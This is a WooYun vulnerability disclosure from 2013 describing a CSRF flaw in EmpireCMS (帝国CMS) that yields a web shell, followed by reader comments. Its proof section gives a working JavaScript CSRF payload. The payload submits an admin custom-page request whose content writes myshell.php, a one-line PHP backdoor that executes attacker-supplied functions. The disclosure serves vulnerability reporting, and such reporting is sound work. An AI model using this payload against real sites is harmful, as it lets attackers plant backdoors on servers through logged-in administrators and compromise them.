当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032472

漏洞标题:帝国CMS CSRF GetShell

相关厂商:phome.net

漏洞作者: ‫‌

提交时间:2013-07-28 11:04

修复时间:2013-10-26 11:05

公开时间:2013-10-26 11:05

漏洞类型:CSRF

危害等级:中

自评Rank:7

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

问题位置比较多,暂时举此一例。
对请求提交没有任何判断。竟然说是最安全的CMS,把DZ森马的完全不放在眼里啊。

详细说明:

废话不多。方式、Code直接放。
ecmscom.php
提交请求进行自定义页面添加,内容直接写后门。

截图


保存后直接在/e/admin/目录生成myshell.php。
检查发现没有判断请求来路。于是继续构造CSRF。

漏洞证明:

<Script>
//type of form: multipart/form-data
function ajax(){
	var request = false;
	if(window.XMLHttpRequest) {
		request = new XMLHttpRequest();
	} else if(window.ActiveXObject) {
		var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
		for(var i=0; i<versions.length; i++) {
			try {
				request = new ActiveXObject(versions[i]);
			} catch(e) {}
		}
	}
	return request;
}
var _x = ajax();
post();
function post() {
	src="http://127.0.0.1/e/admin/ecmscom.php";
	argv_0="enews=AddUserpage&id=&oldpath=page.html&cid=&gid=1&pagemod=1&title=aaa&path=page.html&classid=0&pagetitle=&pagekeywords=&pagedescription=&pagetext=%3C%3Fphp+file_put_contents%28%27myshell.php%27%2C%27%3C%3Fphp+%24_GET%5Bc%5D%28%24_POST%5Bx%5D%29%3B%3F%3E%27%29%3B%3F%3E&Submit=%E6%8F%90%E4%BA%A4";
	xhr_act("POST",src,argv_0);
}
function xhr_act(_m,_s,_a){
	_x.open(_m,_s,false);
	if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
	_x.send(_a);
	return _x.responseText;
}
</script>
Test!


保存页面,访问,生成。

修复方案:

你们看着办啊。。

版权声明:转载请注明来源 ‫‌@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2013-07-28 13:11 | Sct7p ( 实习白帽子 | Rank:62 漏洞数:9 | 懂与不懂之间只隔了一层纸,懂的人会觉得很...)

    说实话帝国cms真的算很安全的。除非getshell。几本没地方可以够了

  2. 2013-07-28 13:44 | ITLynn ( 路人 | Rank:13 漏洞数:5 | 还有几天就去从军了,野战兵!)

    洞主ID有个性!

  3. 2013-07-28 17:15 | 有妹子送上 ( 实习白帽子 | Rank:89 漏洞数:28 | 杭州最帅的男人)

    mark

  4. 2013-07-30 09:46 | Panni_007 ( 路人 | Rank:17 漏洞数:10 | 专注于信息安全领域 http://www.panni00...)

    @ITLynn 洞主是个厂商!!!!!!!!!!!!!

  5. 2013-07-30 10:01 | SGKer ( 路人 | Rank:4 漏洞数:1 | 乌拉轼)

    = = 洞主ID。。。好灰主流啊

  6. 2013-07-30 14:08 | Croxy ( 普通白帽子 | Rank:513 漏洞数:54 | 只会送人头)

    @Panni_007 怎么看是厂商。。

  7. 2013-07-30 16:25 | Panni_007 ( 路人 | Rank:17 漏洞数:10 | 专注于信息安全领域 http://www.panni00...)

    @Croxy 你点他名字看看……

  8. 2013-07-30 16:48 | Croxy ( 普通白帽子 | Rank:513 漏洞数:54 | 只会送人头)

    @Panni_007 那些点不了的就是了? 那么以前也看过几个。。

  9. 2013-07-30 16:59 | juuxdd ( 路人 | Rank:4 漏洞数:1 | ส)

    & #8235 ;& zwnj ;---------------& #8235; &zwn j; 洞主的名字!~~~去掉空格

  10. 2013-08-01 15:51 | 0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)

    &#8235;&zwnj;

  11. 2013-08-12 22:19 | 萧然 ( 路人 | Rank:0 漏洞数:2 | 喜欢一切美丽的东西!)

    &#8235;&zwnj; --------------- &#8235;&zwnj;什么用?

  12. 2013-11-22 13:08 | 月清晖 ( 路人 | Rank:9 漏洞数:1 | some of what?)

    正在关注这个洞。

  13. 2014-09-20 15:23 | doubi ( 路人 | Rank:2 漏洞数:3 | 台上的24位女嘉宾好,我叫doubi来自欧洲,...)

    找不到这个文件啊ecmscom.php 是在网站后加这个文件么